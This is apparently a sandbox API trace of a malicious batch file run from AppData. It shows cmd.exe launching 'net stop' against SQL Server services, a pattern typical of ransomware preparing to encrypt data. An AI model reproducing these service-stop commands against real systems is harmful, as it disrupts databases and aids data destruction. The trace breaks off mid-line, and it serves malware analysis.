(hConsoleHandle=0x264, dwMode=0x0) returned 0 [0198.553] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.553] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0198.553] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.553] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0198.553] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.553] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0198.553] SetConsoleInputExeNameW () returned 0x1 [0198.553] GetConsoleOutputCP () returned 0x1b5 [0198.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0198.554] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0198.554] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0198.554] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.554] SetFilePointer (in: hFile=0x74, lDistanceToMove=2737, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.554] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0198.554] GetProcessHeap () returned 0x3e0000 [0198.555] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0198.555] GetProcessHeap () returned 0x3e0000 [0198.555] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0198.555] GetProcessHeap () returned 0x3e0000 [0198.555] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0198.555] GetProcessHeap () returned 0x3e0000 [0198.555] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0198.555] GetProcessHeap () returned 0x3e0000 [0198.555] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0198.555] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.555] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab1 [0198.555] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe10, lpOverlapped=0x0) returned 1 [0198.555] SetFilePointer (in: hFile=0x74, lDistanceToMove=2770, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad2 [0198.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLServerADHelper /y\r\n\nce /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 33 [0198.556] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.556] GetFileType (hFile=0x74) returned 0x1 [0198.556] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.556] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad2 [0198.556] GetProcessHeap () returned 0x3e0000 [0198.556] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0198.556] GetProcessHeap () returned 0x3e0000 [0198.556] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0198.559] _tell (_FileHandle=3) returned 2770 [0198.559] _close (_FileHandle=3) returned 0 [0198.559] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0198.559] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0198.559] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0198.559] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0198.559] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0198.559] _wcsicmp (_String1="net", _String2="CD") returned 11 [0198.559] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0198.559] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0198.560] _wcsicmp (_String1="net", _String2="REN") returned -4 [0198.560] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0198.560] _wcsicmp (_String1="net", _String2="SET") returned -5 [0198.560] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0198.560] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0198.560] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0198.560] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0198.560] _wcsicmp (_String1="net", _String2="MD") returned 1 [0198.560] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0198.560] _wcsicmp (_String1="net", _String2="RD") returned -4 [0198.560] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0198.560] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0198.560] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0198.560] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0198.560] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0198.560] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0198.560] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0198.560] _wcsicmp (_String1="net", _String2="VER") returned -8 [0198.560] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0198.560] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0198.560] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0198.560] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0198.560] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0198.560] _wcsicmp (_String1="net", _String2="START") returned -5 [0198.560] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0198.560] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0198.560] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0198.560] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0198.560] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0198.560] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0198.560] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0198.560] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0198.560] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0198.560] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0198.561] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0198.561] SetErrorMode (uMode=0x0) returned 0x1 [0198.561] GetProcessHeap () returned 0x3e0000 [0198.561] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0198.561] GetProcessHeap () returned 0x3e0000 [0198.561] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0198.562] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.562] GetProcessHeap () returned 0x3e0000 [0198.562] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0198.562] GetProcessHeap () returned 0x3e0000 [0198.562] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0198.562] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.562] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.563] GetLastError () returned 0x2 [0198.563] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.563] GetLastError () returned 0x2 [0198.563] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.564] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.564] GetLastError () returned 0x2 [0198.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.565] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.565] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.566] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0198.566] SetErrorMode (uMode=0x0) returned 0x1 [0198.566] GetProcessHeap () returned 0x3e0000 [0198.566] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0198.566] GetProcessHeap () returned 0x3e0000 [0198.566] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0198.567] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.567] GetProcessHeap () returned 0x3e0000 [0198.567] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0198.567] GetProcessHeap () returned 0x3e0000 [0198.567] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0198.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.567] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.567] GetLastError () returned 0x2 [0198.568] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.568] GetLastError () returned 0x2 [0198.568] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.569] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.569] GetLastError () returned 0x2 [0198.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.570] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.570] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.570] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0198.570] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0198.570] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0198.571] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0198.571] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLServerADHelper /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLServerADHelper /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLServerADHelper /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa20, dwThreadId=0xaa4)) returned 1 [0198.574] CloseHandle (hObject=0x74) returned 1 [0198.574] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0198.574] GetProcessHeap () returned 0x3e0000 [0198.574] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.574] GetEnvironmentStringsW () returned 0x3f8408* [0198.575] GetProcessHeap () returned 0x3e0000 [0198.575] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.575] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.575] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0198.699] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0198.699] CloseHandle (hObject=0x78) returned 1 [0198.699] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0198.699] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0198.699] GetProcessHeap () returned 0x3e0000 [0198.699] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.699] GetEnvironmentStringsW () returned 0x3f8408* [0198.700] GetProcessHeap () returned 0x3e0000 [0198.700] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.700] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.700] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0198.700] GetProcessHeap () returned 0x3e0000 [0198.700] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.700] GetEnvironmentStringsW () returned 0x3f8408* [0198.700] GetProcessHeap () returned 0x3e0000 [0198.700] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.700] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.700] GetProcessHeap () returned 0x3e0000 [0198.700] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0198.700] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0198.700] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.700] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0198.700] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.700] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0198.700] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.700] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0198.701] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.701] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0198.701] SetConsoleInputExeNameW () returned 0x1 [0198.701] GetConsoleOutputCP () returned 0x1b5 [0198.701] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0198.701] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0198.701] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0198.701] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.701] SetFilePointer (in: hFile=0x78, lDistanceToMove=2770, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad2 [0198.701] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0198.702] GetProcessHeap () returned 0x3e0000 [0198.702] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0198.702] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.702] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad2 [0198.702] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xdef, lpOverlapped=0x0) returned 1 [0198.702] SetFilePointer (in: hFile=0x78, lDistanceToMove=2796, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaec [0198.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLTELEMETRY /y\r\ner /y\r\n\nce /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 26 [0198.703] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.703] GetFileType (hFile=0x78) returned 0x1 [0198.703] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.703] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaec [0198.703] GetProcessHeap () returned 0x3e0000 [0198.703] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0198.703] GetProcessHeap () returned 0x3e0000 [0198.703] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0198.706] _tell (_FileHandle=3) returned 2796 [0198.706] _close (_FileHandle=3) returned 0 [0198.706] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0198.707] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0198.707] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0198.707] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0198.707] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0198.707] _wcsicmp (_String1="net", _String2="CD") returned 11 [0198.707] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0198.707] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0198.707] _wcsicmp (_String1="net", _String2="REN") returned -4 [0198.707] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0198.707] _wcsicmp (_String1="net", _String2="SET") returned -5 [0198.707] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0198.707] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0198.707] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0198.707] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0198.707] _wcsicmp (_String1="net", _String2="MD") returned 1 [0198.707] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0198.707] _wcsicmp (_String1="net", _String2="RD") returned -4 [0198.707] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0198.707] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0198.707] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0198.707] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0198.707] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0198.707] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0198.707] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0198.707] _wcsicmp (_String1="net", _String2="VER") returned -8 [0198.707] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0198.707] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0198.707] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0198.707] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0198.707] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0198.707] _wcsicmp (_String1="net", _String2="START") returned -5 [0198.707] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0198.707] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0198.707] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0198.707] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0198.707] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0198.707] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0198.708] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0198.708] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0198.708] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0198.708] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0198.708] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0198.708] SetErrorMode (uMode=0x0) returned 0x1 [0198.708] GetProcessHeap () returned 0x3e0000 [0198.708] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0198.708] GetProcessHeap () returned 0x3e0000 [0198.708] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0198.709] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.709] GetProcessHeap () returned 0x3e0000 [0198.709] RtlAllocateHeap (HeapHandle=0x3e0000, 